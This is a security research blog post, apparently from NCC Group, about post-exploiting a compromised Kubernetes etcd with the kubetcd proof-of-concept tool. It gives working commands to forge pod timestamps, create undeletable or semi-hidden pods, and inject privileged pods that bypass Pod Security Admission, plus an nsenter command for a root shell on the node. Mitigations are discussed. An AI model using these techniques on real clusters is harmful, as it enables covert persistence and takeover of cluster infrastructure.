Post-exploiting a compromised etcd – Full control over the cluster and its nodes

7 November 2023 at 08:00

Kubernetes is essentially a framework of services that together form its typical architecture, which can be divided into two roles: the control plane, which acts as the central control hub and hosts most of the components, and the nodes or workers, where containers and their workloads actually run.

Within the control plane we typically find the following components:

  • kube-apiserver: This component acts as the brain of the cluster, handling requests from clients (such as kubectl) and coordinating with other components to ensure their proper functioning.
  • scheduler: Responsible for determining the appropriate node to deploy a given pod to.
  • controller manager: Manages the status of nodes, jobs or service accounts.
  • etcd: A key-value store that stores all cluster-related data.

Inside the nodes we typically find:

  • kubelet: An agent running on each node, responsible for keeping the pods running and in a healthy state.
  • kube-proxy: Exposes services running on pods to the network.

When considering the attack surface of Kubernetes, we usually think of unauthenticated components such as the kube-apiserver and kubelet, leaked tokens or credentials that grant access to certain cluster features, and non-hardened containers that may provide access to the underlying host. etcd, however, is often perceived solely as the place where cluster information is stored and from which secrets can be extracted. But etcd is much more than that.

What is etcd and how does it work?

Etcd, a project external to the Kubernetes core, is a non-relational key-value database that stores all the information about the cluster, including pods, deployments, network policies, roles, and more. In fact, a cluster backup is essentially a dump of etcd, and a restore is also performed through this component. Given its critical role in the Kubernetes architecture, can't we use it for more than just extracting secrets?
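That backup and restore workflow is exposed directly by etcdctl. A minimal sketch follows; the endpoint, certificate paths and output locations are illustrative and depend on the installation, and newer etcd releases also ship the restore step as etcdutl snapshot restore:

$ ETCDCTL_API=3 etcdctl --endpoints 127.0.0.1:2379 \
    --cacert=/etc/kubernetes/pki/etcd/ca.crt \
    --cert=/etc/kubernetes/pki/etcd/server.crt \
    --key=/etc/kubernetes/pki/etcd/server.key \
    snapshot save /tmp/etcd-backup.db
$ ETCDCTL_API=3 etcdctl snapshot restore /tmp/etcd-backup.db --data-dir /var/lib/etcd-restored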

Its function as a key-value database is straightforward. Entries can be added or edited using the put command, the value of keys can be retrieved using get, deletions can be performed using delete, and a directory tree structure can be created:

$ etcdctl put /key1 value1
OK
$ etcdctl put /folder1/key1 value2
OK
$ etcdctl get / --prefix --keys-only
/folder1/key1
/key1
$ etcdctl get /folder1/key1
/folder1/key1
value2

How Kubernetes uses etcd: Protobuf

While the operation of etcd is relatively straightforward, let's take a look at how Kubernetes stores its resources, such as a pod, in the database. We will create a pod and extract its entry from etcd:

$ kubectl run nginx --image nginx
pod/nginx created
$ kubectl get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          20s
$ ETCDCTL_API=3 etcdctl --endpoints 127.0.0.1:2379 --cert=/etc/kubernetes/pki/etcd/server.crt --key=/etc/kubernetes/pki/etcd/server.key --cacert=/etc/kubernetes/pki/etcd/ca.crt get /registry/pods/default/nginx
/registry/pods/default/nginx
k8s

v1Pod�
�

nginx▒default"*$920c8c37-3295-4e66-ad4b-7b3ad57f2c192�퇣Z

runnginxbe
!cni.projectcalico.org/containerID@545434f9686cc9ef02b4dd16f6ddf13a89e819c25a30ed7c103a4ab8a86d7703b/
ni.projectcalico.org/podIP10.96.110.138/32b0
cni.projectcalico.org/podIPs10.96.110.138/32��
calicoUpdate▒v�퇣FieldsV1:�
�{"f:metadata":{"f:annotations":{".":{},"f:cni.projectcalico.org/containerID":{},"f:cni.projectcalico.org/podIP":{},"f:cni.projectcalico.org/podIPs":{}}}}Bstatus��

kubectl-runUpdate▒v�퇣FieldsV1:�
�{"f:metadata":{"f:labels":{".":{},"f:run":{}}},"f:spec":{"f:containers":{"k:{\\"name\\":\\"nginx\\"}":{".":{},"f:image":{},"f:imagePullPolicy":{},"f:name":{},"f:resources":{},"f:terminationMessagePath":{},"f:terminationMessagePolicy":{}}},"f:dnsPolicy":{},"f:enableServiceLinks":{},"f:restartPolicy":{},"f:schedulerName":{},"f:securityContext":{},"f:terminationGracePeriodSeconds":{}}}B��
kubeletUpdate▒v�퇣FieldsV1:�
�{"f:status":{"f:conditions":{"k:{\\"type\\":\\"ContainersReady\\"}":{".":{},"f:lastProbeTime":{},"f:lastTransitionTime":{},"f:status":{},"f:type":{}},"k:{\\"type\\":\\"Initialized\\"}":{".":{},"f:lastProbeTime":{},"f:lastTransitionTime":{},"f:status":{},"f:type":{}},"k:{\\"type\\":\\"Ready\\"}":{".":{},"f:lastProbeTime":{},"f:lastTransitionTime":{},"f:status":{},"f:type":{}}},"f:containerStatuses":{},"f:hostIP":{},"f:phase":{},"f:podIP":{},"f:podIPs":{".":{},"k:{\\"ip\\":\\"10.96.110.138\\"}":{".":{},"f:ip":{}}},"f:startTime":{}}}Bstatus�
�
kube-api-access-b9xkqk�h
"

�▒token
(▒ 

kube-root-ca.crt
ca.crtca.crt
)'
%
        namespace▒
v1metadata.namespace��
nginxnginx*BJL
kube-api-access-b9xkq▒-/var/run/secrets/kubernetes.io/serviceaccount"2j/dev/termination-logrAlways����File▒Always 2
                                                                                                                   ClusterFirstBdefaultJdefaultR
                                                                                                                                                kind-worker2X`hr���default-scheduler�6
node.kubernetes.io/not-readyExists▒"    NoExecute(��8
node.kubernetes.io/unreachableExists▒"  NoExecute(�����PreemptLowerPriority▒�
Running#

InitializedTrue�퇣*2
ReadyTrue�퇣*2'
ContainersReadyTrue�퇣*2$

PodScheduledTrue�퇣*2▒"*
10.96.110.13�퇣B�
nginx

�퇣▒ (2docker.io/library/nginx:latest:_docker.io/library/nginx@sha256:480868e8c8c797794257e2abd88d0f9a8809b2fe956cbfbc05dcc0bca1f7cd43BMcontainerd://dbe056bb7be0dfb74a3f8dc6bd75441fe9625d2c56bd5fcd988b780b8cb6884eHJ
BestEffortZb
10.96.110.138▒"

As you can see, the data extracted from the pod in etcd is not just alphanumeric characters. This is because Kubernetes serialises the data using protobuf.

Protobuf, short for Protocol Buffers, is a data serialisation format developed by Google that is independent of programming languages. It enables efficient communication and data exchange between different systems. Protobuf uses a schema or protocol definition to define the structure of the serialised data. This schema is defined using a simple language called the Protocol Buffer Language.

For example, let’s consider a protobuf message to represent data about a person. We would define the structure of the protobuf message as follows:

syntax = "proto3";

message Person {
  string name = 1;
  int32 age = 2;
  string email = 3;
}
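To see what serialisation with such a schema looks like in practice, protoc can encode a text-format message into the binary wire format and decode it back. This is only an illustrative sketch; the file names (person.proto, person.txt) and the message contents are hypothetical:

$ cat person.txt
name: "Alice"
age: 30
email: "alice@example.com"
$ protoc --encode=Person person.proto < person.txt > person.bin
$ protoc --decode=Person person.proto < person.bin
name: "Alice"
age: 30
email: "alice@example.com"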

If we wanted to serialise other types of data, such as car or book data, the parameters required to define them would be different to those required to define a person. The same principle is true for Kubernetes. In Kubernetes, multiple resources can be defined, such as pods, roles, network policies, and namespaces, among others. While they share a common structure, not all of them can be serialised in the same way, as they require different parameters and definitions. Therefore, different schemas are required to serialise these different objects.

Fortunately, there is auger, an application developed by Joe Betz, a technical staff member at Google. Auger builds on the Kubernetes source code and its schemas, allowing the data stored in etcd to be deserialised into YAML and JSON, and serialised back again. At NCC Group, we have created a wrapper for auger called kubetcd to demonstrate the potential criticality of a compromised etcd through a proof of concept (PoC).
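To give an idea of what this looks like in practice, an etcd value can be piped through auger to obtain a readable manifest, and auger encode performs the reverse operation. The following is a sketch based on auger's documented decode workflow (output omitted), using the same endpoint and certificates as the earlier examples; the result is the full pod manifest in YAML, including fields that kubectl normally hides:

$ ETCDCTL_API=3 etcdctl --endpoints 127.0.0.1:2379 \
    --cacert=/etc/kubernetes/pki/etcd/ca.crt \
    --cert=/etc/kubernetes/pki/etcd/server.crt \
    --key=/etc/kubernetes/pki/etcd/server.key \
    get /registry/pods/default/nginx --print-value-only | auger decode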

Limitations

As a post-exploitation technique, this approach has several limitations. The first and most obvious is that we would need to have compromised, as root, the host running the etcd service: the service typically listens only on localhost, and authenticating to it requires access to the following certificates and key (a quick connectivity check using them is sketched after this list). The default paths used by most installation scripts are:

  • /etc/kubernetes/pki/etcd/ca.crt
  • /etc/kubernetes/pki/etcd/server.crt
  • /etc/kubernetes/pki/etcd/server.key (this is only readable by root)
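With those three files, direct access to etcd can be confirmed with standard etcdctl commands, for example (output omitted):

$ ETCDCTL_API=3 etcdctl --endpoints 127.0.0.1:2379 \
    --cacert=/etc/kubernetes/pki/etcd/ca.crt \
    --cert=/etc/kubernetes/pki/etcd/server.crt \
    --key=/etc/kubernetes/pki/etcd/server.key \
    endpoint health
$ ETCDCTL_API=3 etcdctl --endpoints 127.0.0.1:2379 \
    --cacert=/etc/kubernetes/pki/etcd/ca.crt \
    --cert=/etc/kubernetes/pki/etcd/server.crt \
    --key=/etc/kubernetes/pki/etcd/server.key \
    get /registry/ --prefix --keys-only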

A second limitation is that the resources we want to inject need to already exist in the cluster so that they can be used as templates, especially those that actually run, such as pods. This is necessary because execution metadata is added once the creation request has passed through the kube-apiserver, and occasionally there is third-party data (e.g. from Calico) that is not typically included in a raw manifest.

The third and final limitation is that this technique is only applicable to self-managed environments, whether on-premises or on virtual instances in the cloud. Cloud providers that offer managed Kubernetes are responsible for managing and securing the control plane, which means that access not only to etcd but also to the scheduler or controller manager is restricted and users cannot interact with them. Therefore, this technique is not suitable for managed environments.

Injecting resources and tampering data

Since data is written to etcd as protobuf serialised with a different schema per resource, the kubetcd wrapper aims to emulate the typical syntax of the native kubectl client. However, when interacting directly with etcd, many fields that are managed by the logic of the kube-apiserver can be modified without restriction. A simple example is the timestamp that records the creation date and time of a pod:

root@kind-control-plane:/# kubectl get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          38s
root@kind-control-plane:/# kubetcd create pod nginx -t nginx --time 2000-01-31T00:00:00Z
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Path injected: /registry/pods/default/nginx
OK
root@kind-control-plane:/# kubectl get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          23y

Changing the timestamp of a newly created pod makes it appear, beyond what is shown in the event logs, as if it had been running in the cluster for an arbitrary period of time. This could give any administrator pause as to whether it is safe to delete it or whether doing so would affect any services.

Persistence

Now that we know we can tamper with the startup date of a pod, we can explore modifying other parameters, such as changing the path in etcd to gain persistence in the cluster. When we create a pod named X, it is injected into etcd at the path /registry/pods/<namespace>/X. However, with direct access to etcd, we can make the pod name and its path in the database not match, which will prevent it from being deleted by the kube-apiserver:

root@kind-control-plane:/# kubetcd create pod nginxpersistent -t nginx -p randomentry
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Path injected: /registry/pods/default/randomentry
OK
root@kind-control-plane:/# kubectl get pods
NAME              READY   STATUS    RESTARTS   AGE
nginx             1/1     Running   0          23y
nginxpersistent   1/1     Running   0          23y
root@kind-control-plane:/# kubectl delete pod nginxpersistent
Error from server (NotFound): pods "nginxpersistent" not found

Taking this a step further, it is possible to create inconsistencies in pods by manipulating not only the pod name, but also the namespace. By running pods in a namespace that does not match the entry in etcd, we can make them semi-hidden and difficult to identify or manage effectively:

root@kind-control-plane:/# kubetcd create pod nginx_hidden -t nginx -n invisible --fake-ns
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Path injected: /registry/pods/invisible/nginx_hidden
OK

Note that with --fake-ns, the invisible namespace is only used for the etcd injection path; the default namespace has not been replaced in the manifest itself. Because of this inconsistency, the pod will not appear when listing the default namespace, and the invisible namespace will not be indexed. The pod only shows up when resources are listed across all namespaces with --all-namespaces or -A:

root@kind-control-plane:/# kubectl get pods
NAME              READY   STATUS    RESTARTS   AGE
nginx             1/1     Running   0          23y
nginxpersistent   1/1     Running   0          23y
root@kind-control-plane:/# kubectl get namespaces
NAME                 STATUS   AGE
default              Active   13m
kube-node-lease      Active   13m
kube-public          Active   13m
kube-system          Active   13m
local-path-storage   Active   13m
root@kind-control-plane:/# kubectl get pods -A | grep hidden
default              nginx_hidden  1/1     Running   0   23y

By manipulating the namespace entry in etcd, we can create pods that appear to run in one namespace, but are actually associated with a different namespace defined in their manifest. This can cause confusion and make it difficult for administrators to accurately track and manage pods within the cluster.

These are just a few basic examples of directly modifying data in etcd, specifically in relation to pods. However, the possibilities and combinations of these techniques can lead to other interesting scenarios.
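Under the hood, all of these tricks boil down to a get/decode/edit/encode/put loop against etcd, which kubetcd automates. A hand-rolled sketch of the persistence example above is shown below; certificate flags are omitted for brevity, and pushing the raw binary value back through the CLI can be fragile, so treat this as illustrative rather than a drop-in recipe:

$ etcdctl get /registry/pods/default/nginx --print-value-only | auger decode > pod.yaml
$ # edit pod.yaml: name, creationTimestamp, namespace, securityContext, ...
$ auger encode < pod.yaml | etcdctl put /registry/pods/default/randomentry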

Bypassing AdmissionControllers

Kubernetes includes several elements for cluster hardening, specifically for pods and their containers. The most notable elements are:

  • SecurityContext, which allows, among other things, preventing a pod from running as root, mounting filesystems in read-only mode, or blocking capabilities.
  • Seccomp, which is applied at the node level and restricts or enables certain syscalls.
  • AppArmor, which provides more granular syscall management than Seccomp.

However, all of these hardening features may require policies to enforce their use, and this is where Admission Controllers come into play. There are several types of built-in admission controllers, and custom ones can also be created, known as webhook admission controllers. Whether built-in or webhook, they can be of two types:

  • Validation: These accept or deny the deployment of a resource based on the defined policy. For example, the NamespaceExists Admission Controller denies the creation of a resource if the specified namespace does not exist.
  • Mutation: These modify the resource and the cluster to allow its deployment. For example, the NamespaceAutoProvision Admission Controller checks resource requests to be deployed in a namespace and creates the namespace if it does not exist.

There is a built-in validation-type Admission Controller that enforces the deployment of hardened pods, known as Pod Security Admission (PSA). This Admission Controller supports three predefined levels of security, known as the Pod Security Standards, which are detailed in the official Kubernetes documentation. In summary, they are as follows:

  • Privileged: No restrictions. This policy allows everything, including all the permissions needed to perform a pod breakout.
  • Baseline: This policy applies a minimum set of hardening rules, such as restricting the use of host-shared namespaces, using AppArmor, or allowing only a subset of capabilities.
  • Restricted: This is the most restrictive policy and applies almost all available hardening options.

PSAs replace the obsolete Pod Security Policies (PSP) and are applied at the namespace level, so all pods deployed in a namespace where these policies are defined are subject to the configured pod security standard.
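A namespace like the restricted-ns used below is typically locked down by applying the PSA labels to it, the same labels that appear in the namespace YAML further down. A sketch with kubectl (the namespace name is simply the one used in this post):

$ kubectl create namespace restricted-ns
$ kubectl label namespace restricted-ns \
    pod-security.kubernetes.io/enforce=restricted \
    pod-security.kubernetes.io/audit=restricted \
    pod-security.kubernetes.io/warn=restricted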

It is worth noting that these PSAs apply equally to all roles, so even a cluster admin cannot circumvent the restrictions unless the namespace is recreated or relabelled with these policies disabled:

root@kind-control-plane:/# kubectl get ns restricted-ns -o yaml
apiVersion: v1
kind: Namespace
metadata:
  creationTimestamp: "2023-05-23T10:20:22Z"
  labels:
    kubernetes.io/metadata.name: restricted-ns
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/warn: restricted
  name: restricted-ns
  resourceVersion: "3710"
  uid: 2277ebac-e487-4d59-8a09-97bef27cc0d9
spec:
  finalizers:
  - kubernetes
status:
  phase: Active

root@kind-control-plane:/# kubectl run nginx --image nginx -n restricted-ns
Error from server (Forbidden): pods "nginx" is forbidden: violates PodSecurity "restricted:latest": allowPrivilegeEscalation != false (container "nginx" must set securityContext.allowPrivilegeEscalation=false), unrestricted capabilities (container "nginx" must set securityContext.capabilities.drop=["ALL"]), runAsNonRoot != true (pod or container "nginx" must set securityContext.runAsNonRoot=true), seccompProfile (pod or container "nginx" must set securityContext.seccompProfile.type to "RuntimeDefault" or "Localhost")

As expected, not even a cluster administrator is allowed to deploy a pod without meeting all the security requirements imposed by the PSA. However, it is possible to inject privileged pods into namespaces restricted by PSAs using etcd:

root@kind-control-plane:/# kubetcd create pod nginx_privileged -t nginx -n restricted-ns -P
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Privileged SecurityContext Added
Path injected: /registry/pods/restricted-ns/nginx_privileged
OK
root@kind-control-plane:/# kubectl get pods -n restricted-ns
NAME               READY   STATUS    RESTARTS   AGE
nginx_privileged   1/1     Running   0          23y
root@kind-control-plane:/# kubectl get pod nginx_privileged -n restricted-ns -o yaml | grep "restricted\|privileged:"
    namespace: restricted-ns
        privileged: true

Being able to deploy unrestricted privileged pods, it would be easy to get a shell on the underlying node. This demonstrates that gaining write access to etcd, whether it is deployed as a pod within the cluster, as a local service on the control plane or as a separate node in a dedicated etcd cluster, could compromise the Kubernetes cluster and all of its underlying infrastructure.
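As an illustration of that first point, if the spec injected through etcd is both privileged and shares the host PID namespace, a root shell on the node is a single exec away. Note that kubetcd's -P output above only confirms the privileged flag, so the hostPID setting and the availability of nsenter in the image are assumptions in this sketch:

root@kind-control-plane:/# kubectl exec -it nginx_privileged -n restricted-ns -- nsenter --target 1 --mount --uts --ipc --net --pid -- bash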

Why does this work?

When working with the regular client, kubectl, every request goes to the kube-apiserver, where the following steps run in order: authentication, authorisation and Admission Controllers. Once the request has been authenticated, authorised and filtered by the admission controllers, the kube-apiserver passes it on to the other components of the cluster to organise the provisioning of the desired resource. In other words, the kube-apiserver is not only the entry point to the cluster, it also applies all the controls on access to it.

However, by injecting these resources directly into etcd, we bypass all of those controls, because the data does not flow from the client through the kube-apiserver; it is written straight into the backend database where the cluster's state is stored. As currently designed, the Kubernetes architecture trusts etcd: if an element is already in the database, it is assumed to have passed all the controls imposed by the kube-apiserver.

Mitigating the threat

Despite the capabilities of this post-exploitation technique, it would be relatively easy to detect, especially if we try to obtain shells on the nodes, mainly by third-party runtime security solutions that run at the node level and have good log ingestion times, such as Falco or some EDRs.

However, as already demonstrated, gaining access to the nodes would be a simple task, and since most container engines run as root by default with user namespaces disabled, we would get a direct root shell in most cases. This would allow us to tamper with host services and processes, whether EDRs or log-shipping agents. Enabling user namespaces, using container sandboxing technologies or running the container engine in rootless mode could help mitigate this attack vector.
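On the Kubernetes side, user namespace support for pods is controlled by the hostUsers field of the pod spec, which at the time of writing still sits behind a feature gate, so treat the following as a sketch rather than a drop-in configuration:

$ kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: nginx-userns
spec:
  hostUsers: false   # run the pod in its own user namespace: root inside the container maps to an unprivileged UID on the host
  containers:
  - name: nginx
    image: nginx
EOF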

Conclusions

The state of the art regarding the attack surface of a Kubernetes cluster has been established for some time, focusing on elements such as unauthenticated kube-apiserver or kubelet services, leaked tokens or credentials, and various pod breakout techniques. Most of the techniques described so far in relation to etcd have focused primarily on the extraction of secrets and the lack of encryption of data at rest.

This paper aims to demonstrate that a compromised etcd is the most critical element within the cluster, as it is subject neither to role restrictions nor to Admission Controllers. This makes it easy to compromise not only the cluster itself, but also its underlying infrastructure, including every node on which a kubelet is deployed.

This should make us rethink how etcd is deployed and how much trust the cluster places in it, and encourage additional mechanisms that ensure the integrity of the data it stores.
